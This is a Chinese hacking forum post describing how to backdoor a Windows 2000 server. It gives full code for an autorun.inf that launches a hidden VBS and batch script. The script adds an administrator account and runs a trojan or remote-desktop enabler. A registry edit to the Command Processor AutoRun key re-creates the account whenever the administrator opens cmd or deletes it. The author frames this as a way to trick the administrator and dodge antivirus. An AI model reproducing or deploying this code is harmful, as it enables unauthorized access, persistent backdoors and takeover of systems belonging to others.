antorun.inf+开3389+不死帐号

最近遇到一个变态机器，可以执行user命令，sql只对本机开放，而且是dbo权限，社工猜出来管理员密码，管理员帐号为administrator+users权限，但是我怎么搞都不能让机器重启，而且我加管理员还被他骂，看了下机器装了瑞星，没有360，机器为2000server。于是想到自动播放，于是写了一个antorun.inf想搞开3389.方法有了，但是想了下，局限性很大，首先就是突破杀软，再者就是诱骗管理员点击盘符运行。
        呵呵，方法有了，不过想想，好像实现的可能性不大，本机实验成功。发出来代码，大家给点意见。

antorun.inf代码如下：

[AutoRun]
open=
shell\open=打开(&O)
shell\open\Command=WScript.exe 1.vbs
shell\open\Default=1
shell\explore=资源管理器(&X)
shell\explore\Command=WScript.exe 1.vbs

意思是不管双击还是右键打开，或者使用资源管理器，都运行1.vbs

1.vbs代码如下：

Set ws = CreateObject("Wscript.Shell")
ws.run "cmd /c 1.bat",vbhide

意思是运行同目录下的1.bat

1.bat代码如下：

net user cui cuipeilong /add
net localgroup administrators cui /add
net user cui /active:yes
h:\1.exe

意思是加用户并且加入管理员组

h:\1.exe为H盘下的exe文件，可以选择木马，也可以选择开3389工具，或者其他。同时，如果加入一个reg文件，那么如果对方管理员发现了你加的用户，删除的同时一样建立一个相同帐户，也就是不死帐户。

我以2000server机器下reg为例子。

2000.reg代码如下：

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor]
"AutoRun"="c:\\winnt\\1.vbs"
"CompletionChar"=dword:00000040
"DefaultColor"=dword:00000000
"EnableExtensions"=dword:00000001
"PathCompletionChar"=dword:00000040

其中autorun下路径可以改为实际路径。

运行后建立不死帐户，不论管理员运行cmd，或者删除帐户都会建立相同用户。

以上代码，保存后，放在一起，比如放在c：\winnt\system32下，连同1.vbs，1.bat和3389.exe都放在一起，制造完美的自动运行antorun.inf+开3389+不死帐号。